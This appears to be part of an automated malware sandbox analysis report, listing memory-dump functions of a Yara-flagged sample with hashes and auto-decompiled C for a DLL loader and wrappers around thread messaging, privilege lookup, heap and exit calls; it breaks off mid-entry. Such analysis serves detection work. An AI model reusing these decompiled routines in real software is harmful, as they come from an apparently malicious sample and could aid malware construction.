                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                                                          • Instruction ID: 3d3d17baa0602041cc143a76009b3f3fa99b49e95e50b47cc2ee624adef075e7
                                                                          • Opcode Fuzzy Hash: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
                                                                          • Instruction Fuzzy Hash: 10900261246041525745B1694404A074006A7E0381792C036A1504990C85669856E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                                                          • Instruction ID: c026f655fec7fa114ab613049bd28a9a4c0a60f4a22d9b6420e8ea7a610899b8
                                                                          • Opcode Fuzzy Hash: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
                                                                          • Instruction Fuzzy Hash: 3C9002A134500442D30061694414F060005D7E1341F52C039E1154594D8659CC52B166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                                                          • Instruction ID: 51b2ab36ccd8a3418056d602dac2de474d8b3dd97001d7f37f8fc799697b06e9
                                                                          • Opcode Fuzzy Hash: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
                                                                          • Instruction Fuzzy Hash: 139002B120500402D34071694404B46000597D0341F52C035A5154594E86998DD5B6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                                                          • Instruction ID: 01bdc4a1eab63954c2403bd72f59dccc8c5e2dd31fc2bd06c26da9b2c7d2dd71
                                                                          • Opcode Fuzzy Hash: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
                                                                          • Instruction Fuzzy Hash: 1A90026160500042434071798844E064005BBE1351752C135A0A88590D85998865A6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                                                          • Instruction ID: fbad0c2c4dcec2923ebb553f7525d3212f8f99b3f91adfd1834d07fcbcd40fbf
                                                                          • Opcode Fuzzy Hash: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
                                                                          • Instruction Fuzzy Hash: AB90027120540402D30061694814B0B000597D0342F52C035A1254595D86658851B5B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                                                          • Instruction ID: ae7da978a7e5cde2a2f0c6cb20f3141907a17bba57da171a0684a8b24ad60794
                                                                          • Opcode Fuzzy Hash: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
                                                                          • Instruction Fuzzy Hash: D790026121580042D30065794C14F07000597D0343F52C139A0244594CC9558861A561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                                                          • Instruction ID: 6381622d47ce0e66eb2de472c1f860bcdd3cab034cd1b972542807a7c8a8d7b0
                                                                          • Opcode Fuzzy Hash: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
                                                                          • Instruction Fuzzy Hash: F39002A120600003430571694414B16400A97E0341B52C035E11045D0DC5658891B165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                                                          • Instruction ID: b8fd0063769497a3c4a5a0bd6fe35cb974202eb275c34afae74f1d5b9240f4ad
                                                                          • Opcode Fuzzy Hash: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
                                                                          • Instruction Fuzzy Hash: 37900265215000030305A5690704A07004697D5391352C035F1105590CD6618861A161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                                                          • Instruction ID: 1be88d5a2eb8e1157703dafa4542dbe18b3bff5bb0e0eea057e283ca6be5da01
                                                                          • Opcode Fuzzy Hash: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
                                                                          • Instruction Fuzzy Hash: 9A90027120508802D31061698404B4A000597D0341F56C435A4514698D86D58891B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                                                          • Instruction ID: 2100620bea3a32f8e19b9d102ffd03e8059d5de84ad96fdeb43e22a3d7cdc196
                                                                          • Opcode Fuzzy Hash: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
                                                                          • Instruction Fuzzy Hash: 1B90027120500802D38071694404B4A000597D1341F92C039A0115694DCA558A59B7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                                                          • Instruction ID: 1ceede0a7cb670c4d60282d1e800704b6b0748993a5cb60170de2753694ab54e
                                                                          • Opcode Fuzzy Hash: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
                                                                          • Instruction Fuzzy Hash: DC90026130500003D34071695418B064005E7E1341F52D035E0504594CD9558856A262
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                                                          • Instruction ID: 6ab0d2ee7abec32692453d5130e9f00ba43068ef8c65de180ea78c516198fc8e
                                                                          • Opcode Fuzzy Hash: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
                                                                          • Instruction Fuzzy Hash: 8290026921700002D38071695408B0A000597D1342F92D439A0105598CC9558869A361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                                                          • Instruction ID: 13b9e750c891e9de3df035afe71697c3ad864ce51e480c7cae803506e194450d
                                                                          • Opcode Fuzzy Hash: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
                                                                          • Instruction Fuzzy Hash: 7490027131514402D31061698404B06000597D1341F52C435A0914598D86D58891B162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                                                          • Instruction ID: 4fc44ef761ff19529dbd619fe24a43887543a74015ed4c8e16905f9e288fe321
                                                                          • Opcode Fuzzy Hash: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
                                                                          • Instruction Fuzzy Hash: 6990027120500402D30065A95408B46000597E0341F52D035A5114595EC6A58891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                          • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                          • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                          • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B13, Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E00409B13(intOrPtr* __eax, intOrPtr* __edx, void* __esi, void* __eflags, intOrPtr _a8, char _a1351286606) {
				intOrPtr _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v536;
				void* __ebp;
				intOrPtr* _t19;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t19 = __eax;
				if(__eflags != 0) {
					asm("aaa");
					_a1351286606 = _a1351286606 - 1;
					do {
						 *_t19 =  *_t19 +  *((intOrPtr*)(_t19 + 1));
						_t19 = _t19 - 1;
						_t21 = _t21 - 1;
					} while (_t21 != 0);
					if(__esi > 1) {
						_t20 = __edx;
						_t22 = __esi - 1;
						do {
							 *_t20 =  *_t20 +  *((intOrPtr*)(_t20 + 1));
							_t20 = _t20 + 1;
							_t22 = _t22 - 1;
						} while (_t22 != 0);
					}
					return _t19;
				} else {
					if(__eflags <= 0) {
						L13:
						__eax = E0041B1F0();
						__esp = __esp + 8;
						goto L14;
					} else {
						ss = __ebp;
						 *0x557fc038 = __eax;
						_push(__ebp);
						__ebp = __esp;
						__esp = __esp - 0x214;
						__edx =  &_v12;
						__eax =  &_v536;
						_v8 =  &_v536;
						__eax = E0041AB50( &_v12, 0x104, _a8);
						__eflags = __eax;
						if(__eflags != 0) {
							__eax = _v8;
							__eax = L0041AF70(__eflags, _v8);
							__eflags = __eax;
							if(__eax != 0) {
								_push(0);
								_push( &_v12);
								goto L13;
							}
							L14:
							__edx = _v4;
							__eax = E00419300(_v4);
							_v12 = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__edx = _a8;
								 &_v12 =  *((intOrPtr*)(_a8 + 8));
								__eax = LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
								__eax = _v12;
							}
							__esp = __ebp;
							_pop(__ebp);
							return __eax;
						} else {
							__esp = __ebp;
							_pop(__ebp);
							return __eax;
						}
					}
				}
			}












                                                                          0x00409b13
                                                                          0x00409b15
                                                                          0x00409aee
                                                                          0x00409aef
                                                                          0x00409af3
                                                                          0x00409af6
                                                                          0x00409af8
                                                                          0x00409af9
                                                                          0x00409af9
                                                                          0x00409aff
                                                                          0x00409b01
                                                                          0x00409b03
                                                                          0x00409b06
                                                                          0x00409b09
                                                                          0x00409b0b
                                                                          0x00409b0c
                                                                          0x00409b0c
                                                                          0x00409b06
                                                                          0x00409b12
                                                                          0x00409b17
                                                                          0x00409b17
                                                                          0x00409b65
                                                                          0x00409b65
                                                                          0x00409b6a
                                                                          0x00000000
                                                                          0x00409b1a
                                                                          0x00409b1b
                                                                          0x00409b1c
                                                                          0x00409b20
                                                                          0x00409b21
                                                                          0x00409b23
                                                                          0x00409b2d
                                                                          0x00409b30
                                                                          0x00409b3c
                                                                          0x00409b3f
                                                                          0x00409b47
                                                                          0x00409b49
                                                                          0x00409b4f
                                                                          0x00409b53
                                                                          0x00409b5b
                                                                          0x00409b5d
                                                                          0x00409b62
                                                                          0x00409b64
                                                                          0x00000000
                                                                          0x00409b64
                                                                          0x00409b6d
                                                                          0x00409b6d
                                                                          0x00409b71
                                                                          0x00409b79
                                                                          0x00409b7c
                                                                          0x00409b7e
                                                                          0x00409b80
                                                                          0x00409b87
                                                                          0x00409b92
                                                                          0x00409b94
                                                                          0x00409b94
                                                                          0x00409b97
                                                                          0x00409b99
                                                                          0x00409b9a
                                                                          0x00409b4b
                                                                          0x00409b4b
                                                                          0x00409b4d
                                                                          0x00409b4e
                                                                          0x00409b4e
                                                                          0x00409b49
                                                                          0x00409b17

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction ID: 47962a35b1496f828657aac512d805a3f2d84d81aaba07c8a432479da790b69c
                                                                          • Opcode Fuzzy Hash: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction Fuzzy Hash: 8C112775E041496BCF10DBA4E842EEDB775AB54318F0441EAE90CE7283F936AE58CB45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 43%
                                                                          			E00407260(void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_push(0);
					_push(0);
					_push(0x111);
					 *_t13 =  *_t13 + _t13;
					_t14 = PostThreadMessageW(_t21, ??, ??, ??); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                          0x00407260
                                                                          0x0040726f
                                                                          0x00407273
                                                                          0x0040727e
                                                                          0x0040728e
                                                                          0x0040729e
                                                                          0x004072a3
                                                                          0x004072aa
                                                                          0x004072ad
                                                                          0x004072b0
                                                                          0x004072b2
                                                                          0x004072b4
                                                                          0x004072b7
                                                                          0x004072ba
                                                                          0x004072bc
                                                                          0x004072be
                                                                          0x004072db
                                                                          0x004072db
                                                                          0x00000000
                                                                          0x004072dd
                                                                          0x004072e2

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                          • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184C2, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e38b4a3ca11752328516fc31a1770d010ca5d848a233b08256c029cd4fbc7abf
                                                                          • Instruction ID: 81d09adf5c81ef1f741ab8b7a9607e6be393085894e564b464267bffea62a691
                                                                          • Opcode Fuzzy Hash: e38b4a3ca11752328516fc31a1770d010ca5d848a233b08256c029cd4fbc7abf
                                                                          • Instruction Fuzzy Hash: 25F027B9504300BFDB21CF249C81ED33B5AAF55308F12425FF85947742DA34D952CAB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418622, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 4cc6bd92fdad7af9d965fe5b36e06ccf12bc5a3907220f95130b4532a2e7092a
                                                                          • Instruction ID: b492ee65ba8bc85551817de21ab0afc2df0ea4206b9bc69b9402acfe1ba14197
                                                                          • Opcode Fuzzy Hash: 4cc6bd92fdad7af9d965fe5b36e06ccf12bc5a3907220f95130b4532a2e7092a
                                                                          • Instruction Fuzzy Hash: CEF0A0B2600214ABCB20DF94DC80EE77768EF45390F214569FA1C97241DA3199558BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407234, Relevance: 1.5, APIs: 1, Instructions: 27threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: c95f3f5b4541407be756903fb573f4315997178a7ec17d53fe996b01ffaf1364
                                                                          • Instruction ID: 6da4f28ee51dfecb3d60f010f74f6e954b6275d5870eac05df03b05b21d7113b
                                                                          • Opcode Fuzzy Hash: c95f3f5b4541407be756903fb573f4315997178a7ec17d53fe996b01ffaf1364
                                                                          • Instruction Fuzzy Hash: FCE07D11E462142DD31251546C02EBF3B4897E2701F0004FFFD40D89C2D498041982F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E00418DC0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                          0x004184a7
                                                                          0x004184bd
                                                                          0x004184c1

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E00418DC0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                          0x0041864a
                                                                          0x00418660
                                                                          0x00418664

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418510(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00418DC0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                          0x00418513
                                                                          0x0041852a
                                                                          0x00418538

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004185D6, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
